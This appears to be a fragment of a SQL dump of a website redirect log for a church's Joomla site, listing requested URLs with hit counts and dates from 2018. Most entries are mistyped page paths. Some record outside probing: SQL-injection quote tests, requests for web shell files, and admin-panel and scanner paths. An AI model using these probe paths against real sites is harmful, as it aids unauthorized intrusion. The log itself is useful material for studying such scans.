(8211, 'https://www.lifeoasisinternationalchurch.org/index.php/component/content/article/11-demo-articles/53-testing', NULL, '', '', 2, 0, '2018-05-10 22:27:47', '0000-00-00 00:00:00', 301),
(8212, 'https://www.lifeoasisinternationalchurch.org/resources/blog/itemlist/category/', NULL, '', '', 3, 0, '2018-05-10 22:33:19', '0000-00-00 00:00:00', 301),
(8213, 'https://www.lifeoasisinternationalchurch.org/index.php/component/content/category/17-fp-headlines-lists', NULL, '', '', 1, 0, '2018-05-10 22:43:29', '0000-00-00 00:00:00', 301),
(8214, 'https://lifeoasisinternationalchurch.org/2011-08-10-21-22-57', NULL, '', '', 6, 0, '2018-05-10 22:46:22', '0000-00-00 00:00:00', 301),
(8215, 'https://www.lifeoasisinternationalchurch.org/resources/blog/itemlist/tag/', NULL, '', '', 3, 0, '2018-05-10 23:28:45', '0000-00-00 00:00:00', 301),
(8216, 'https://www.lifeoasisinternationalchurch.org/divine-agenda/itemlist/category/', NULL, '', '', 4, 0, '2018-05-11 01:33:55', '0000-00-00 00:00:00', 301),
(8217, 'https://www.lifeoasisinternationalchurch.org/divine-agenda/item/', NULL, '', '', 3, 0, '2018-05-11 01:41:20', '0000-00-00 00:00:00', 301),
(8218, 'https://www.lifeoasisinternationalchurch.org/component/k2/itemlist/category/', NULL, '', '', 2, 0, '2018-05-11 04:20:19', '0000-00-00 00:00:00', 301),
(8219, 'https://www.lifeoasisinternationalchurch.org/component/tags/tag/', NULL, '', '', 4, 0, '2018-05-11 05:23:56', '0000-00-00 00:00:00', 301),
(8220, 'https://www.lifeoasisinternationalchurch.org/20-demo/', NULL, '', '', 2, 0, '2018-05-11 08:11:07', '0000-00-00 00:00:00', 301),
(8221, 'https://www.lifeoasisinternationalchurch.org/div', NULL, '', '', 1, 0, '2018-05-11 09:59:28', '0000-00-00 00:00:00', 301),
(8222, 'https://www.lifeoasisinternationalchurch.org/di', NULL, '', '', 1, 0, '2018-05-11 09:59:28', '0000-00-00 00:00:00', 301),
(8223, 'https://www.lifeoasisinternationalchurch.org/divi', NULL, '', '', 1, 0, '2018-05-11 09:59:29', '0000-00-00 00:00:00', 301),
(8224, 'https://www.lifeoasisinternationalchurch.org/divin', NULL, '', '', 1, 0, '2018-05-11 09:59:29', '0000-00-00 00:00:00', 301),
(8225, 'https://www.lifeoasisinternationalchurch.org/divine', NULL, '', '', 1, 0, '2018-05-11 09:59:30', '0000-00-00 00:00:00', 301),
(8226, 'https://www.lifeoasisinternationalchurch.org/divine-', NULL, '', '', 1, 0, '2018-05-11 09:59:39', '0000-00-00 00:00:00', 301),
(8227, 'https://www.lifeoasisinternationalchurch.org/divine-age', NULL, '', '', 1, 0, '2018-05-11 09:59:40', '0000-00-00 00:00:00', 301),
(8228, 'https://www.lifeoasisinternationalchurch.org/divine-ag', NULL, '', '', 1, 0, '2018-05-11 09:59:40', '0000-00-00 00:00:00', 301),
(8229, 'https://www.lifeoasisinternationalchurch.org/divine-a', NULL, '', '', 1, 0, '2018-05-11 09:59:40', '0000-00-00 00:00:00', 301),
(8230, 'https://www.lifeoasisinternationalchurch.org/divine-agen', NULL, '', '', 1, 0, '2018-05-11 09:59:40', '0000-00-00 00:00:00', 301),
(8231, 'https://www.lifeoasisinternationalchurch.org/divine-agend', NULL, '', '', 1, 0, '2018-05-11 09:59:41', '0000-00-00 00:00:00', 301),
(8232, 'https://lifeoasisinternationalchurch.org/ckeditor/ckfinder/ckfinder.html', NULL, '', '', 1, 0, '2018-05-12 02:40:00', '0000-00-00 00:00:00', 301),
(8233, 'https://lifeoasisinternationalchurch.org/35anniversary', NULL, '', '', 1, 0, '2018-05-12 05:34:02', '0000-00-00 00:00:00', 301),
(8234, 'https://www.lifeoasisinternationalchurch.org/35years', NULL, '', '', 2, 0, '2018-05-12 07:06:00', '0000-00-00 00:00:00', 301),
(8235, 'https://www.lifeoasisinternationalchurch.org/streaming(video)', NULL, '', '', 1, 0, '2018-05-12 08:45:40', '0000-00-00 00:00:00', 301),
(8236, 'https://lifeoasisinternationalchurch.org/so', NULL, '', '', 1, 0, '2018-05-12 09:05:08', '0000-00-00 00:00:00', 301),
(8237, 'https://lifeoasisinternationalchurch.org/streaming/35thanniversary', NULL, '', '', 1, 0, '2018-05-12 20:51:35', '0000-00-00 00:00:00', 301),
(8238, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=x86ogns0vzg', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 2, 0, '2018-05-13 21:23:32', '0000-00-00 00:00:00', 301),
(8239, 'https://lifeoasisinternationalchurch.org/streamin', NULL, '', '', 18, 0, '2018-05-14 17:10:34', '0000-00-00 00:00:00', 301),
(8240, 'https://lifeoasisinternationalchurch.org/media/ckfinder/ckfinder.html', NULL, '', '', 1, 0, '2018-05-14 18:04:32', '0000-00-00 00:00:00', 301),
(8241, 'https://lifeoasisinternationalchurch.org/34-prayer-a-fasting-day-25', NULL, '', '', 7, 0, '2018-05-16 11:56:53', '0000-00-00 00:00:00', 301),
(8242, 'https://lifeoasisinternationalchurch.org/cde42170f4f5b29105ed3977c1f5f4d1.php', NULL, 'http://lifeoasisinternationalchurch.org/cde42170f4f5b29105ed3977c1f5f4d1.php', '', 1, 0, '2018-05-16 14:44:03', '0000-00-00 00:00:00', 301),
(8243, 'https://www.lifeoasisinternationalchurch.org/audiostreaming', NULL, '', '', 1, 0, '2018-05-16 17:27:40', '0000-00-00 00:00:00', 301),
(8244, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/sermons', NULL, '', '', 1, 0, '2018-05-17 00:16:04', '0000-00-00 00:00:00', 301),
(8245, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content\'a=0&view=article&id=45&itemid=218', NULL, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content\'A=0&view=article&id=45&Itemid=218', '', 1, 0, '2018-05-17 02:53:53', '0000-00-00 00:00:00', 301),
(8246, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'a=0&id=45&itemid=218', NULL, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'A=0&id=45&Itemid=218', '', 1, 0, '2018-05-17 02:53:54', '0000-00-00 00:00:00', 301),
(8247, 'https://142.4.21.132/sdk', NULL, '', '', 20, 0, '2018-05-19 06:37:05', '0000-00-00 00:00:00', 301),
(8248, 'https://142.4.21.132/nmaplowercheck1526711822', NULL, '', '', 1, 0, '2018-05-19 06:37:12', '0000-00-00 00:00:00', 301),
(8249, 'https://142.4.21.132/hnap1', NULL, '', '', 20, 0, '2018-05-19 06:37:12', '0000-00-00 00:00:00', 301),
(8250, 'https://142.4.21.132/evox/about', NULL, '', '', 19, 0, '2018-05-19 06:37:13', '0000-00-00 00:00:00', 301),
(8251, 'https://www.lifeoasisinternationalchurch.org/streaminghilll l', NULL, '', '', 1, 0, '2018-05-19 07:47:29', '0000-00-00 00:00:00', 301),
(8252, 'https://www.lifeoasisinternationalchurch.org/index.php/programme/18-loic/35-trm', NULL, '', '', 8, 0, '2018-05-19 17:10:18', '0000-00-00 00:00:00', 301),
(8253, 'https://lifeoasisinternationalchurch.org/gobc-2018/events/god-of-breakthroughs-convention-2018-online-registration/', NULL, '', '', 3, 0, '2018-05-19 22:39:33', '0000-00-00 00:00:00', 301),
(8254, 'https://lifeoasisinternationalchurch.org/gobc-2018/', NULL, '', '', 1, 0, '2018-05-20 16:34:06', '0000-00-00 00:00:00', 301),
(8255, 'https://www.mnbr.info/vb/index.php', NULL, '', '', 1, 0, '2018-05-20 21:09:14', '0000-00-00 00:00:00', 301),
(8256, 'https://lifeoasisinternationalchurch.org/gobc2018', NULL, '', '', 2, 0, '2018-05-20 21:46:39', '0000-00-00 00:00:00', 301),
(8257, 'https://www.lifeoasisinternationalchurch.org/36-prayer-a-fasting-day-27', NULL, '', '', 7, 0, '2018-05-21 07:10:48', '0000-00-00 00:00:00', 301),
(8258, 'https://lifeoasisinternationalchurch.org/streaminglive', NULL, '', '', 1, 0, '2018-05-21 16:11:49', '0000-00-00 00:00:00', 301),
(8259, 'https://www.lifeoasisinternationalchurch.org/private_streaming', NULL, '', '', 3, 0, '2018-05-22 22:09:11', '0000-00-00 00:00:00', 301),
(8260, 'https://lifeoasisinternationalchurch.org/gobc20181?ver=4.9.6', NULL, 'https://lifeoasisinternationalchurch.org/gobc2018/', '', 2, 0, '2018-05-23 10:52:45', '0000-00-00 00:00:00', 301),
(8261, 'https://142.4.21.132//_asterisk//ultimatex.php', NULL, '', '', 1, 0, '2018-05-23 20:08:51', '0000-00-00 00:00:00', 301),
(8262, 'https://142.4.21.132//assets/ultimatex.php', NULL, '', '', 1, 0, '2018-05-24 02:38:48', '0000-00-00 00:00:00', 301),
(8263, 'https://lifeoasisinternationalchurch.org/members/page2.html', NULL, 'http://lifeoasisinternationalchurch.org', '', 2, 0, '2018-05-24 14:09:34', '0000-00-00 00:00:00', 301),
(8264, 'https://www.lifeoasisinternationalchurch.org/media/priv.php', NULL, '', '', 1, 0, '2018-05-24 17:15:36', '0000-00-00 00:00:00', 301),
(8265, 'https://www.lifeoasisinternationalchurch.org//kontakty', NULL, '', '', 1, 0, '2018-05-24 17:15:38', '0000-00-00 00:00:00', 301),
(8266, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/12-prayer-a-fasting-day-3', NULL, '', '', 6, 0, '2018-05-25 01:40:19', '0000-00-00 00:00:00', 301),
(8267, 'https://lifeoasisinternationalchurch.org/me.php', NULL, '', '', 1, 0, '2018-05-25 11:54:12', '0000-00-00 00:00:00', 301),
(8268, 'https://www.lifeoasisinternationalchurch.org/you tube', NULL, '', '', 1, 0, '2018-05-25 16:06:41', '0000-00-00 00:00:00', 301),
(8269, 'https://lifeoasisinternationalchurch.org/qcefwy3rdv', NULL, 'http://http://lical.waytorussia.ru//', '', 1, 0, '2018-05-25 23:59:11', '0000-00-00 00:00:00', 301),
(8270, 'https://lifeoasisinternationalchurch.org/zhqqlgsevjza6', NULL, 'http://http://lical.waytorussia.ru//', '', 1, 0, '2018-05-25 23:59:19', '0000-00-00 00:00:00', 301),
(8271, 'https://www.lifeoasisinternationalchurch.org/readme.html', NULL, 'https://www.lifeoasisinternationalchurch.org/readme.html', '', 2, 0, '2018-05-26 04:18:47', '0000-00-00 00:00:00', 301),
(8272, 'https://www.lifeoasisinternationalchurch.org/steeaming', NULL, '', '', 2, 0, '2018-05-26 06:06:38', '0000-00-00 00:00:00', 301),
(8273, 'https://lifeoasisinternationalchurch.org/pma/', NULL, '', '', 10, 0, '2018-05-26 19:01:12', '0000-00-00 00:00:00', 301),
(8274, 'https://lifeoasisinternationalchurch.org/myadmin/', NULL, '', '', 5, 0, '2018-05-26 19:01:16', '0000-00-00 00:00:00', 301),
(8275, 'https://www.lifeoasisinternationalchurch.org/about-us/service-times first service', NULL, '', '', 1, 0, '2018-05-27 06:43:02', '0000-00-00 00:00:00', 301),
(8276, 'https://www.lifeoasisinternationalchurch.org/streaing', NULL, '', '', 2, 0, '2018-05-27 09:07:33', '0000-00-00 00:00:00', 301),
(8277, 'https://www.lifeoasisinternationalchurch.org/19-prayer-a-fasting-day-10', NULL, '', '', 6, 0, '2018-05-27 09:44:11', '0000-00-00 00:00:00', 301),
(8278, 'https://www.lifeoasisinternationalchurch.org/jolokia', NULL, '', '', 1, 0, '2018-05-27 17:52:48', '0000-00-00 00:00:00', 301),
(8279, 'https://lifeoasisinternationalchurch.org/jolokia', NULL, '', '', 1, 0, '2018-05-27 17:52:48', '0000-00-00 00:00:00', 301),
(8280, 'https://lifeoasisinternationalchurch.org/bibleschool.php', NULL, '', '', 3, 0, '2018-05-28 02:28:13', '0000-00-00 00:00:00', 301),
(8281, 'https://lifeoasisinternationalchurch.org/components/com_b2jcontact/', NULL, '', '', 3, 0, '2018-05-28 11:52:29', '0000-00-00 00:00:00', 301),
(8282, 'https://www.lifeoasisinternationalchurch.org/gonc2018', NULL, '', '', 1, 0, '2018-05-28 14:35:04', '0000-00-00 00:00:00', 301),
(8283, 'https://lifeoasisinternationalchurch.org/media/priv.php', NULL, '', '', 2, 0, '2018-05-29 02:27:22', '0000-00-00 00:00:00', 301),
(8284, 'https://lifeoasisinternationalchurch.org/index.php/169-prophetic-words-for-day-5', NULL, '', '', 2, 0, '2018-05-30 10:01:24', '0000-00-00 00:00:00', 301),
(8285, 'https://lifeoasisinternationalchurch.org/index.php/81-prayer-focus-for-day-2', NULL, '', '', 4, 0, '2018-05-30 10:27:10', '0000-00-00 00:00:00', 301),
(8286, 'https://lifeoasisinternationalchurch.org/index.php/130-prayer-focus-for-day-7', NULL, '', '', 2, 0, '2018-05-30 13:52:49', '0000-00-00 00:00:00', 301),
(8287, 'https://lifeoasisinternationalchurch.org/index.php/79-prayer-focus-for-day-19', NULL, '', '', 2, 0, '2018-05-30 13:52:55', '0000-00-00 00:00:00', 301),
(8288, 'https://lifeoasisinternationalchurch.org/index.php/106-prayer-focus-for-day-32', NULL, '', '', 2, 0, '2018-05-30 13:53:04', '0000-00-00 00:00:00', 301),
(8289, 'https://lifeoasisinternationalchurch.org/index.php/179-2015-day-3', NULL, '', '', 2, 0, '2018-05-30 13:53:31', '0000-00-00 00:00:00', 301),
(8290, 'https://lifeoasisinternationalchurch.org/index.php/226-2016-day-9', NULL, '', '', 2, 0, '2018-05-30 13:53:55', '0000-00-00 00:00:00', 301),
(8291, 'https://lifeoasisinternationalchurch.org/index.php/211-2015-day-37', NULL, '', '', 3, 0, '2018-05-30 13:54:03', '0000-00-00 00:00:00', 301),
(8292, 'https://lifeoasisinternationalchurch.org/index.php/191-2015-day-15', NULL, '', '', 2, 0, '2018-05-30 13:54:21', '0000-00-00 00:00:00', 301),
(8293, 'https://lifeoasisinternationalchurch.org/index.php/176-2015-day-1', NULL, '', '', 2, 0, '2018-05-30 13:54:31', '0000-00-00 00:00:00', 301),
(8294, 'https://lifeoasisinternationalchurch.org/index.php/180-2015-day-4', NULL, '', '', 2, 0, '2018-05-30 13:54:39', '0000-00-00 00:00:00', 301),
(8295, 'https://lifeoasisinternationalchurch.org/index.php/167-day-39', NULL, '', '', 2, 0, '2018-05-30 13:55:48', '0000-00-00 00:00:00', 301),
(8296, 'https://lifeoasisinternationalchurch.org/index.php/166-day-38', NULL, '', '', 2, 0, '2018-05-30 13:55:50', '0000-00-00 00:00:00', 301),
(8297, 'https://lifeoasisinternationalchurch.org/index.php/160-day-32', NULL, '', '', 2, 0, '2018-05-30 13:55:51', '0000-00-00 00:00:00', 301),
(8298, 'https://lifeoasisinternationalchurch.org/index.php/144-day-18', NULL, '', '', 2, 0, '2018-05-30 13:56:04', '0000-00-00 00:00:00', 301),
(8299, 'https://lifeoasisinternationalchurch.org/index.php/140-day-14', NULL, '', '', 2, 0, '2018-05-30 13:56:06', '0000-00-00 00:00:00', 301),
(8300, 'https://lifeoasisinternationalchurch.org/index.php/149-day-22', NULL, '', '', 2, 0, '2018-05-30 13:56:07', '0000-00-00 00:00:00', 301),
(8301, 'https://lifeoasisinternationalchurch.org/index.php/219-2016-day-2', NULL, '', '', 2, 0, '2018-05-30 13:58:51', '0000-00-00 00:00:00', 301),
(8302, 'https://lifeoasisinternationalchurch.org/index.php/13-2014fasting-prayer/175-day72014', NULL, '', '', 3, 0, '2018-05-30 14:31:04', '0000-00-00 00:00:00', 301),
(8303, 'https://lifeoasisinternationalchurch.org/index.php/80-2014-2', NULL, '', '', 2, 0, '2018-05-30 14:31:38', '0000-00-00 00:00:00', 301),
(8304, 'https://lifeoasisinternationalchurch.org/index.php/231-2016-day-14', NULL, '', '', 2, 0, '2018-05-30 14:36:28', '0000-00-00 00:00:00', 301),
(8305, 'https://lifeoasisinternationalchurch.org/index.php/178-2015-day-2', NULL, '', '', 2, 0, '2018-05-30 14:36:50', '0000-00-00 00:00:00', 301),
(8306, 'https://lifeoasisinternationalchurch.org/index.php/215-2015-day-13-1', NULL, '', '', 2, 0, '2018-05-30 14:36:55', '0000-00-00 00:00:00', 301),
(8307, 'https://lifeoasisinternationalchurch.org/index.php/145-day-19', NULL, '', '', 2, 0, '2018-05-30 14:39:05', '0000-00-00 00:00:00', 301),
(8308, 'https://lifeoasisinternationalchurch.org/index.php/163-day-35', NULL, '', '', 2, 0, '2018-05-30 15:32:33', '0000-00-00 00:00:00', 301),
(8309, 'https://lifeoasisinternationalchurch.org/index.php/172-day8', NULL, '', '', 2, 0, '2018-05-30 15:38:45', '0000-00-00 00:00:00', 301),
(8310, 'https://lifeoasisinternationalchurch.org/index.php/205-2015-day-31', NULL, '', '', 2, 0, '2018-05-30 15:39:01', '0000-00-00 00:00:00', 301),
(8311, 'https://lifeoasisinternationalchurch.org/index.php/236-2016-day-19', NULL, '', '', 2, 0, '2018-05-30 16:07:52', '0000-00-00 00:00:00', 301),
(8312, 'https://lifeoasisinternationalchurch.org/index.php/229-2016-day-12', NULL, '', '', 2, 0, '2018-05-30 16:08:01', '0000-00-00 00:00:00', 301),
(8313, 'https://lifeoasisinternationalchurch.org/index.php/148-day-21', NULL, '', '', 2, 0, '2018-05-30 16:08:54', '0000-00-00 00:00:00', 301),
(8314, 'https://lifeoasisinternationalchurch.org/index.php/75-prayer-focus-for-day-17', NULL, '', '', 2, 0, '2018-05-30 16:43:33', '0000-00-00 00:00:00', 301),
(8315, 'https://lifeoasisinternationalchurch.org/index.php/153-day-26', NULL, '', '', 2, 0, '2018-05-30 16:44:24', '0000-00-00 00:00:00', 301),
(8316, 'https://lifeoasisinternationalchurch.org/index.php/221-2016-day-4', NULL, '', '', 2, 0, '2018-05-30 16:47:04', '0000-00-00 00:00:00', 301),
(8317, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/57-prayer-a-fasting-day-8', NULL, '', '', 2, 0, '2018-05-30 17:34:01', '0000-00-00 00:00:00', 301),
(8318, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/56-prayer-a-fasting-day-7', NULL, '', '', 2, 0, '2018-05-30 17:47:32', '0000-00-00 00:00:00', 301),
(8319, 'https://lifeoasisinternationalchurch.org/index.php/195-2015-day-20', NULL, '', '', 3, 0, '2018-05-30 17:51:37', '0000-00-00 00:00:00', 301),
(8320, 'https://lifeoasisinternationalchurch.org/index.php/196-2015-day-19', NULL, '', '', 2, 0, '2018-05-30 19:28:23', '0000-00-00 00:00:00', 301),
(8321, 'https://lifeoasisinternationalchurch.org/index.php/183-2015-day-7', NULL, '', '', 2, 0, '2018-05-30 19:28:28', '0000-00-00 00:00:00', 301),
(8322, 'https://lifeoasisinternationalchurch.org/index.php/128-2014-6', NULL, '', '', 2, 0, '2018-05-30 19:28:43', '0000-00-00 00:00:00', 301),
(8323, 'https://lifeoasisinternationalchurch.org/index.php/202-2015-day-27', NULL, '', '', 2, 0, '2018-05-30 19:48:35', '0000-00-00 00:00:00', 301),
(8324, 'https://lifeoasisinternationalchurch.org/index.php/185-2015-day-9', NULL, '', '', 3, 0, '2018-05-30 20:32:59', '0000-00-00 00:00:00', 301),
(8325, 'https://lifeoasisinternationalchurch.org/index.php/127-prayer-focus-for-day-5', NULL, '', '', 2, 0, '2018-05-30 20:47:09', '0000-00-00 00:00:00', 301),
(8326, 'https://lifeoasisinternationalchurch.org/index.php/164-day-36', NULL, '', '', 2, 0, '2018-05-30 21:04:06', '0000-00-00 00:00:00', 301),
(8327, 'https://lifeoasisinternationalchurch.org/index.php/136-day-10', NULL, '', '', 2, 0, '2018-05-30 21:06:42', '0000-00-00 00:00:00', 301),
(8328, 'https://lifeoasisinternationalchurch.org/index.php/187-2015-day-10', NULL, '', '', 2, 0, '2018-05-30 21:46:16', '0000-00-00 00:00:00', 301),
(8329, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/22-prophetic-words-for-day-14', NULL, '', '', 2, 0, '2018-05-30 21:53:42', '0000-00-00 00:00:00', 301),
(8330, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/21-prophetic-words-for-day-13', NULL, '', '', 2, 0, '2018-05-30 22:12:29', '0000-00-00 00:00:00', 301),
(8331, 'https://lifeoasisinternationalchurch.org/index.php/156-day-29', NULL, '', '', 2, 0, '2018-05-30 22:13:07', '0000-00-00 00:00:00', 301),
(8332, 'https://lifeoasisinternationalchurch.org/index.php/264-day-4-of-21-days-fasting-and-prayer-november', NULL, '', '', 6, 0, '2018-05-30 22:34:51', '0000-00-00 00:00:00', 301),
(8333, 'https://lifeoasisinternationalchurch.org/index.php/137-day-11', NULL, '', '', 2, 0, '2018-05-30 22:37:01', '0000-00-00 00:00:00', 301),
(8334, 'https://lifeoasisinternationalchurch.org/index.php/204-2015-day-30', NULL, '', '', 2, 0, '2018-05-30 23:23:06', '0000-00-00 00:00:00', 301),
(8335, 'https://lifeoasisinternationalchurch.org/index.php/146-day2', NULL, '', '', 2, 0, '2018-05-30 23:24:45', '0000-00-00 00:00:00', 301),
(8336, 'https://lifeoasisinternationalchurch.org/index.php/171-prophetic-words-for-day-7', NULL, '', '', 2, 0, '2018-05-30 23:31:43', '0000-00-00 00:00:00', 301),
(8337, 'https://lifeoasisinternationalchurch.org/index.php/214-2015-day-21', NULL, '', '', 2, 0, '2018-05-30 23:42:48', '0000-00-00 00:00:00', 301),
(8338, 'https://lifeoasisinternationalchurch.org/index.php/198-2015-day-23', NULL, '', '', 2, 0, '2018-05-30 23:52:39', '0000-00-00 00:00:00', 301),
(8339, 'https://lifeoasisinternationalchurch.org/index.php/200-2015-day-25', NULL, '', '', 4, 0, '2018-05-30 23:58:41', '0000-00-00 00:00:00', 301),
(8340, 'https://lifeoasisinternationalchurch.org/index.php/103-prayerfocus30', NULL, '', '', 2, 0, '2018-05-31 00:15:00', '0000-00-00 00:00:00', 301),
(8341, 'https://lifeoasisinternationalchurch.org/index.php/132-prayer-focus-for-day-8', NULL, '', '', 4, 0, '2018-05-31 00:22:33', '0000-00-00 00:00:00', 301),
(8342, 'https://lifeoasisinternationalchurch.org/index.php/189-2015-day-12', NULL, '', '', 2, 0, '2018-05-31 00:30:36', '0000-00-00 00:00:00', 301),
(8343, 'https://lifeoasisinternationalchurch.org/index.php/208-2015-day-34', NULL, '', '', 2, 0, '2018-05-31 00:30:37', '0000-00-00 00:00:00', 301),
(8344, 'https://lifeoasisinternationalchurch.org/index.php/228-2016-day-11', NULL, '', '', 2, 0, '2018-05-31 00:30:38', '0000-00-00 00:00:00', 301),
(8345, 'https://lifeoasisinternationalchurch.org/index.php/234-2016-day-17', NULL, '', '', 2, 0, '2018-05-31 00:30:39', '0000-00-00 00:00:00', 301),
(8346, 'https://lifeoasisinternationalchurch.org/index.php/143-day-17', NULL, '', '', 2, 0, '2018-05-31 00:41:52', '0000-00-00 00:00:00', 301),
(8347, 'https://lifeoasisinternationalchurch.org/index.php/150-day-23', NULL, '', '', 3, 0, '2018-05-31 01:43:20', '0000-00-00 00:00:00', 301),
(8348, 'https://lifeoasisinternationalchurch.org/index.php/257-day-8-of-21-days-fasting-and-prayer-october', NULL, '', '', 6, 0, '2018-05-31 01:55:57', '0000-00-00 00:00:00', 301),
(8349, 'https://lifeoasisinternationalchurch.org/index.php/207-2015-day-33', NULL, '', '', 4, 0, '2018-05-31 01:56:12', '0000-00-00 00:00:00', 301),
(8350, 'https://lifeoasisinternationalchurch.org/index.php/199-2015-day-24', NULL, '', '', 2, 0, '2018-05-31 01:56:14', '0000-00-00 00:00:00', 301),
(8351, 'https://lifeoasisinternationalchurch.org/index.php/141-day-15', NULL, '', '', 2, 0, '2018-05-31 02:29:21', '0000-00-00 00:00:00', 301),
(8352, 'https://lifeoasisinternationalchurch.org/index.php/192-2015-day-16', NULL, '', '', 2, 0, '2018-05-31 02:35:58', '0000-00-00 00:00:00', 301),
(8353, 'https://lifeoasisinternationalchurch.org/index.php/138-day-12', NULL, '', '', 2, 0, '2018-05-31 03:05:46', '0000-00-00 00:00:00', 301),
(8354, 'https://lifeoasisinternationalchurch.org/index.php/218-2016-day-1', NULL, '', '', 2, 0, '2018-05-31 03:34:06', '0000-00-00 00:00:00', 301),
(8355, 'https://lifeoasisinternationalchurch.org/index.php/135-day1', NULL, '', '', 2, 0, '2018-05-31 03:36:55', '0000-00-00 00:00:00', 301),
(8356, 'https://lifeoasisinternationalchurch.org/index.php/155-day-28', NULL, '', '', 2, 0, '2018-05-31 05:09:03', '0000-00-00 00:00:00', 301),
(8357, 'https://lifeoasisinternationalchurch.org/index.php/210-2015-day-36', NULL, '', '', 2, 0, '2018-05-31 05:35:13', '0000-00-00 00:00:00', 301),
(8358, 'https://lifeoasisinternationalchurch.org/index.php/238-2016-day-21', NULL, '', '', 2, 0, '2018-05-31 05:35:15', '0000-00-00 00:00:00', 301),
(8359, 'https://lifeoasisinternationalchurch.org/index.php/216-2015-day-28', NULL, '', '', 2, 0, '2018-05-31 05:38:46', '0000-00-00 00:00:00', 301),
(8360, 'https://lifeoasisinternationalchurch.org/index.php/13-2014fasting-prayer/174-prayer-focus-for-day-12', NULL, '', '', 2, 0, '2018-05-31 06:07:56', '0000-00-00 00:00:00', 301),
(8361, 'https://lifeoasisinternationalchurch.org/index.php/154-day-27', NULL, '', '', 2, 0, '2018-05-31 06:08:09', '0000-00-00 00:00:00', 301),
(8362, 'https://lifeoasisinternationalchurch.org/index.php/230-2016-day-13', NULL, '', '', 3, 0, '2018-05-31 06:19:57', '0000-00-00 00:00:00', 301),
(8363, 'https://lifeoasisinternationalchurch.org/index.php/181-2015-day-5', NULL, '', '', 2, 0, '2018-05-31 07:28:36', '0000-00-00 00:00:00', 301),
(8364, 'https://lifeoasisinternationalchurch.org/index.php/151-day-24', NULL, '', '', 2, 0, '2018-05-31 08:40:17', '0000-00-00 00:00:00', 301),
(8365, 'https://lifeoasisinternationalchurch.org/index.php/203-2015-day-29', NULL, '', '', 2, 0, '2018-05-31 09:35:15', '0000-00-00 00:00:00', 301),
(8366, 'https://lifeoasisinternationalchurch.org/index.php/233-2016-day-16', NULL, '', '', 2, 0, '2018-05-31 17:19:14', '0000-00-00 00:00:00', 301),
(8367, 'https://www.lifeoasisinternationalchurch.org/resources/l', NULL, '', '', 1, 0, '2018-05-31 20:02:46', '0000-00-00 00:00:00', 301),
(8368, 'https://www.lifeoasisinternationalchurch.org/resou', NULL, '', '', 1, 0, '2018-05-31 20:02:47', '0000-00-00 00:00:00', 301),
(8369, 'https://lifeoasisinternationalchurch.org/camille.php', NULL, '', '', 2, 0, '2018-06-01 00:19:39', '0000-00-00 00:00:00', 301),
(8370, 'https://lifeoasisinternationalchurch.org/index.php/190-2015-day-14', NULL, '', '', 2, 0, '2018-06-01 00:50:08', '0000-00-00 00:00:00', 301),
(8371, 'https://lifeoasisinternationalchurch.org/pinfon.php', NULL, '', '', 1, 0, '2018-06-01 09:54:34', '0000-00-00 00:00:00', 301),
(8372, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=hc13j6hdxvs', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 2, 0, '2018-06-02 20:47:15', '0000-00-00 00:00:00', 301),
(8373, 'https://lifeoasisinternationalchurch.org/gobcregistration', NULL, '', '', 2, 0, '2018-06-03 06:51:40', '0000-00-00 00:00:00', 301),
(8374, 'https://lifeoasisinternationalchurch.org/index.php/194-2015-day-18', NULL, '', '', 2, 0, '2018-06-03 06:51:56', '0000-00-00 00:00:00', 301),
(8375, 'https://lifeoasisinternationalchurch.org/contactus', NULL, '', '', 2, 0, '2018-06-05 00:20:58', '0000-00-00 00:00:00', 301),
(8376, 'https://lifeoasisinternationalchurch.org/contactar', NULL, '', '', 2, 0, '2018-06-05 00:21:00', '0000-00-00 00:00:00', 301),
(8377, 'https://lifeoasisinternationalchurch.org/contactenos', NULL, '', '', 1, 0, '2018-06-05 00:21:01', '0000-00-00 00:00:00', 301),
(8378, 'https://lifeoasisinternationalchurch.org/contactos', NULL, '', '', 1, 0, '2018-06-05 00:21:01', '0000-00-00 00:00:00', 301),
(8379, 'https://lifeoasisinternationalchurch.org/index.php/contact', NULL, '', '', 1, 0, '2018-06-05 00:21:02', '0000-00-00 00:00:00', 301),
(8380, 'https://lifeoasisinternationalchurch.org/index.php/contactus', NULL, '', '', 1, 0, '2018-06-05 00:21:03', '0000-00-00 00:00:00', 301),
(8381, 'https://lifeoasisinternationalchurch.org/index.php/kontakt', NULL, '', '', 1, 0, '2018-06-05 00:21:04', '0000-00-00 00:00:00', 301),
(8382, 'https://lifeoasisinternationalchurch.org/index.php/contacto', NULL, '', '', 1, 0, '2018-06-05 00:21:05', '0000-00-00 00:00:00', 301),
(8383, 'https://lifeoasisinternationalchurch.org/index.php/iletisim', NULL, '', '', 1, 0, '2018-06-05 00:21:05', '0000-00-00 00:00:00', 301),
(8384, 'https://lifeoasisinternationalchurch.org/index.php/kontakty', NULL, '', '', 1, 0, '2018-06-05 00:21:06', '0000-00-00 00:00:00', 301),
(8385, 'https://lifeoasisinternationalchurch.org/index.php/contatti', NULL, '', '', 1, 0, '2018-06-05 00:21:07', '0000-00-00 00:00:00', 301),
(8386, 'https://lifeoasisinternationalchurch.org/index.php/contactar', NULL, '', '', 1, 0, '2018-06-05 00:21:07', '0000-00-00 00:00:00', 301),
(8387, 'https://lifeoasisinternationalchurch.org/index.php/contato', NULL, '', '', 1, 0, '2018-06-05 00:21:08', '0000-00-00 00:00:00', 301),
(8388, 'https://lifeoasisinternationalchurch.org/index.php/contactenos', NULL, '', '', 1, 0, '2018-06-05 00:21:09', '0000-00-00 00:00:00', 301),
